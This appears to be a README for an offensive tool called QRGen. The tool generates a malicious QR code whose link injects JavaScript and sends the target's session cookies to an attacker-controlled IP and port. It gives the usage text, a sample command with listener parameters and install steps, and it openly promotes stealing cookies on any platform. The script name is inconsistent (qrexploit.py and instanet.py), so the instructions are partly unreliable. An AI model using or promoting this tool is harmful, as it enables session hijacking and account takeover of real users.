QRGen tool allows you to exploit target's session cookies on any platform by generating a malicious qr code. Then, if the target opens the link received with the QR code and deletes the domain part, malicious javascript code is injected and session cookies are sent to you.
The required parameters are given below:
usage: qrexploit.py [-h] [--url URL] [--ip IP] [--port PORT] [--output OUTPUT] [--interactive]
Exploit QRGen steal with cookies qrcode
options:
-h, --help show this help message and exit
--url URL Target site from which cookies will be received
--ip IP Listening address parameter
--port PORT Listening port number parameter
--output OUTPUT QR code output file
--interactive Run in interactive mode with input prompts
python qrexploit.py --url https://example.com --ip 127.0.0.1 --port 4444 --output qr_example.png
You can experience an easy interface by starting QRGen directly in interactive mode:
python3 instanet.py --interactive
You can download instanet directly by saying
pip install -r requirements.txt
python -m pip install -r requirements.txt
My gmail adress: [email protected]